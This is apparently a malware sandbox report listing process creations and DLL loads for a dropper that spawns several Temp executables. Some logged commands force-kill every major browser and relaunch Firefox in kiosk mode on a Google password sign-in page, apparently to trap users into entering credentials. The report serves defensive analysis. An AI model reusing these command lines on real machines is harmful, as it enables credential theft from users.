Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe "C:\Users\user~1\AppData\Local\Temp\1001090001\8138ba21a1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe "C:\Users\user~1\AppData\Local\Temp\1001091001\bd214fbd32.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe "C:\Users\user~1\AppData\Local\Temp\1001092001\136916b3ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe "C:\Users\user~1\AppData\Local\Temp\1001090001\8138ba21a1.exe"
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001093001\num.exe "C:\Users\user~1\AppData\Local\Temp\1001093001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c059e01-df08-4ea7-99e7-8e52a0f774f0} 6000 "\\.\pipe\gecko-crash-server-pipe.6000" 1c95726dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4580 -parentBuildID 20230927232528 -prefsHandle 4572 -prefMapHandle 4480 -prefsLen 26317 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d66d859a-061e-466f-93a3-e7567ce2edce} 6000 "\\.\pipe\gecko-crash-server-pipe.6000" 1c968370810 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe "C:\Users\user~1\AppData\Local\Temp\1001091001\bd214fbd32.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe "C:\Users\user~1\AppData\Local\Temp\1001092001\136916b3ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001093001\num.exe "C:\Users\user~1\AppData\Local\Temp\1001093001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe "C:\Users\user~1\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe"
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe "C:\Users\user~1\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe"
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe "C:\Users\user~1\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe "C:\Users\user~1\AppData\Local\Temp\1001090001\8138ba21a1.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe "C:\Users\user~1\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe "C:\Users\user~1\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe "C:\Users\user~1\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe "C:\Users\user~1\AppData\Local\Temp\1001090001\8138ba21a1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe "C:\Users\user~1\AppData\Local\Temp\1001091001\bd214fbd32.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe "C:\Users\user~1\AppData\Local\Temp\1001092001\136916b3ff.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001093001\num.exe "C:\Users\user~1\AppData\Local\Temp\1001093001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe "C:\Users\user~1\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe"
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe "C:\Users\user~1\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe"
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c059e01-df08-4ea7-99e7-8e52a0f774f0} 6000 "\\.\pipe\gecko-crash-server-pipe.6000" 1c95726dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4580 -parentBuildID 20230927232528 -prefsHandle 4572 -prefMapHandle 4480 -prefsLen 26317 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d66d859a-061e-466f-93a3-e7567ce2edce} 6000 "\\.\pipe\gecko-crash-server-pipe.6000" 1c968370810 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
